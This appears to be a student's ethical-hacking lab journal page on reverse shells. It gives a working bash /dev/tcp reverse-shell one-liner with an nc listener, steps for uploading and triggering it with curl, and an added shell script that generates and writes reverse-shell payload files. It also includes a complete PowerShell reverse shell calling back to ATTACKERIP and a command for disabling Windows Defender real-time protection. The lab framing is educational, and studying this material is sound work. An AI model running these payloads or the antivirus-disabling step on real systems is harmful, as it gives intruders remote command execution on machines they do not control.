Lab 8.2 Reverse Shells - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki
On one terminal: ssh first.last@[email protected]
/bin/bash -i >& /dev/tcp/<eth0 IP of the listening machine>/4449 0>&1  (the path is /dev/tcp/IP/PORT; 4449 is the port used here. >& sends the interactive shell's stdout and stderr into the TCP socket, and 0>&1 makes its stdin read from that same socket, so whatever the listener types is executed.)
Second terminal: nc -nlv -p 4449 - this listens on that port and, once the target connects, gives you the ability to input commands: what you type is sent over the socket to the target's bash and the output comes back. Start the listener before running the /bin/bash line, otherwise the connection is refused.
The same /bin/bash command can be put in a file and uploaded to pippin.shire.local, except the IP has to be the listener's wg0 address rather than eth0, because pippin reaches the listening machine over the WireGuard network, not the eth0 network.
chmod 777 (filename) makes it executable; chmod +x is enough and avoids making the file world-writable. (10.0.5.25)
Listen in the same way with the second terminal (the listener has to be up before the script runs).
Use curl to trigger execution of the uploaded .sh file; the listener should then receive the connection.
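As an added example (not from the lab page), the script below builds the bash /dev/tcp payload described above from either an explicit listener address or the listener's own interface name (eth0 for the lab LAN, wg0 for the WireGuard route to pippin), validates the IP and port, and writes it as an executable file with chmod +x instead of 777. The file name revshell.sh, the function names, and the use of the iproute2 `ip` tool for the interface lookup are my assumptions; the listener itself is still started separately with nc -nlv -p <port>.

```shell
#!/bin/sh
# Added example, not the lab's own code. Builds the bash reverse-shell
# payload used in Lab 8.2 and writes it as an executable script.
# Assumptions: iproute2's `ip` is present for iface_ip; nothing here
# connects anywhere, it only produces the payload text/file.

# Print the first IPv4 address bound to an interface (e.g. eth0 or wg0).
iface_ip() {
    ip -4 -o addr show dev "$1" 2>/dev/null | awk '{print $4}' | cut -d/ -f1 | head -n 1
}

# Accept only a dotted-quad IPv4 literal with every octet <= 255.
valid_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

# Accept only a TCP port in 1-65535.
valid_port() {
    echo "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the one-liner from the lab. >& sends the interactive shell's stdout
# and stderr into the TCP socket; 0>&1 makes its stdin read from that socket,
# so commands typed at the nc listener are executed on the target.
revshell_payload() {
    valid_ipv4 "$1" || { echo "bad listener IP: $1" >&2; return 1; }
    valid_port "$2" || { echo "bad port: $2" >&2; return 1; }
    printf '/bin/bash -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2"
}

# Same, but take the listener address from an interface name, which is the
# eth0-vs-wg0 mistake the lab warns about: pick the interface the target can reach.
revshell_payload_for_iface() {
    addr=$(iface_ip "$1")
    [ -n "$addr" ] || { echo "no IPv4 address on $1" >&2; return 1; }
    revshell_payload "$addr" "$2"
}

# Write the payload as a script and mark it executable. chmod +x is enough;
# the lab's chmod 777 also makes the file world-writable.
write_payload() {
    file=$1; shift
    payload=$(revshell_payload "$@") || return 1
    printf '#!/bin/bash\n%s\n' "$payload" > "$file"
    chmod +x "$file"
}

# usage (hypothetical file name): sh revshell.sh --demo
if [ "${1:-}" = "--demo" ]; then
    revshell_payload 10.0.5.25 4449
    revshell_payload_for_iface wg0 4449 || true
fi
```

Generate the file with write_payload on the attacking machine, upload it, and start nc -nlv -p 4449 before triggering it; the printed payload for the wg0 case is what goes into the file destined for pippin.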
PowerShell code:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
This launches PowerShell as a reverse shell on a Windows system: it connects out to ATTACKERIP:ATTACKERPORT, reads each line the listener sends, runs it with iex, and writes the output back followed by a fake "PS path> " prompt. With the same nc -nlv -p listener running on ATTACKERPORT, uploading this to a Windows server and getting it executed gives you reverse shell access. Windows Defender's real-time protection will block this one-liner, so it has to be disabled first; the lab does this through the Control Panel (on current Windows builds the switch lives under Windows Security > Virus & threat protection settings, and Set-MpPreference -DisableRealtimeMonitoring $true from an elevated PowerShell does the same).